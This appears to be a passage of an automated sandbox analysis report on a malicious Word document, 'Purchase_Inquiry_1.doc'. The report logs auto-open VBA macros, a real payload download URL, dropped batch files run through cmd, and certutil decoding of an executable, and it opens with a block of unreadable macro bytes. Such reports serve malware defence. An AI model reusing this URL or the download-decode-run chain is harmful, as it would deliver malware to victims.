          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, API Stream.Write(??\x14\x00\x08?????\x01?\x03\x07\x00??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'?????????????????????????????????u???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????_??????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????4????????????????????????????????????????????????????????????????????????????????????o??????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O???????????????????????????????????????????????????????????????????????????????l?????????????????????????????????????????????????????????????????U???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Name: downloadFile
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, found possibly 'ADODB.Stream' functions open, savetofile, writeName: downloadFile
          Document contains an embedded VBA with functions possibly related to HTTP operations
          Source: Purchase_Inquiry_1.docStream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, sendName: downloadFile
          Found suspicious ZIP file
          Source: 1741130958.zip.0.drZip Entry: Ppo.bat
          Source: 1741130958.zip0.0.drZip Entry: Ppo.bat
          Microsoft Office drops suspicious files
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\5564642\Ppo.batJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\3546255\Ppo.batJump to behavior
          Office process queries suspicious COM object (likely to drop second stage)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: XML HTTP Request HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32Jump to behavior
          Source: Purchase_Inquiry_1.docOLE, VBA macro line: Sub Document_Open()
          Source: Purchase_Inquiry_1.docOLE, VBA macro line: Sub AutoOpen()
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
          Source: Purchase_Inquiry_1.docOLE indicator, VBA macros: true
          Source: Purchase_Inquiry_1.docStream path 'Macros/VBA/__SRP_0' : http://portalsphere.free.fr/phUploader/uploads/1741111253.zisC:\\1741111253.zixWScript.Shell2The file is safe to download but If file failed to load correctly for view then contact sender..\pp.exeRunVBE7.DLL!!!S!R!Q1!eQ!q"Microsoft.XMLHTTSGETOpenSendStatusADODB.StreamTypeResponseBodyWriteSaveToFileClose pyDESTk4gALtQyxDEST`PDEST=
          Source: i19ag96bvk.exe.13.drStatic PE information: No import functions for PE file found
          Source: i19ag96bvk.exe.13.drStatic PE information: Data appended to the last section found
          Source: classification engineClassification label: mal100.spyw.expl.winDOC@18/10@1/1
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rchase_Inquiry_1.docJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{4456C4CF-3403-4529-B43A-495ED11BAAFF} - OProcSessId.datJump to behavior
          Source: Purchase_Inquiry_1.docOLE indicator, Word Document stream: true
          Source: Purchase_Inquiry_1.docOLE document summary: title field not present or empty
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" "
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Purchase_Inquiry_1.docVirustotal: Detection: 53%
          Source: Purchase_Inquiry_1.docReversingLabs: Detection: 47%
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\3546255\Ppo.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" "Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\3546255\Ppo.bat" "Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dui70.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.immersive.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uianimation.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dui70.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.immersive.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uianimation.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEAutomated click: OK
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEAutomated click: OK
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
          Source: i19ag96bvk.exe.13.drStatic PE information: 0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]
          Source: C:\Windows\SysWOW64\certutil.exeFile created: C:\Users\user\AppData\Local\Temp\i19ag96bvk.exeJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
